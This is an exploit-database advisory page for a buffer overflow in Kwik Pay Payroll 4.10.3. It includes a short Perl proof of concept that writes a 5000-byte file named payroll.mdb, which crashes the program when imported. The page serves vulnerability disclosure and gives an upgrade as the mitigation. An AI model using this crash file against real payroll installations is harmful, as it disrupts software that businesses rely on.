Kwik Pay Payroll .mdb Crash PoC

vendor:

Kwik Pay Payroll

by:

[anonymous]

7,5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Kwik Pay Payroll

Affected Version From: 4.10.3

Affected Version To: 4.10.3

Patch Exists: YES

Related CWE: N/A

CPE: a:kwik_pay:kwik_pay_payroll

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

Kwik Pay Payroll .mdb Crash PoC

A buffer overflow vulnerability exists in Kwik Pay Payroll version 4.10.3, which allows an attacker to crash the program by importing a specially crafted .mdb file. The specially crafted .mdb file contains 5000 bytes of data, which causes the program to crash when imported.

Mitigation:

Upgrade to the latest version of Kwik Pay Payroll.

Source

Exploit-DB raw data:

# Exploit Title: Kwik Pay Payroll .mdb Crash PoC
# Date: April 1, 2010
# Version: 4.10.3
# Tested on: Windows XP SP3
# Cost: 100.00 AU
# Author: [anonymous]
# Site: [http://www.setfreesecurity.com]
# 
# Usage: Run Script, Open the program
# File -> Import Payroll Data 
# Select From Data Source Drop-Down: Kwik-Pay Payroll Data 
# Browse and Import your .mdb File
#
# **********************************************
# ** It took 33 years to save my life         **
# ** thats 11 more years to make things right **
# **********************************************
# My hat goes off to the Exploit-DB Crew!
#!/usr/bin/perl
print "Broke as a Joke. . .\n";

my $data = "\x41" x 5000;
my $money = "payroll.mdb";

open (FILE, ">$money");
print FILE "$data";

print "\nShow me the money!\n";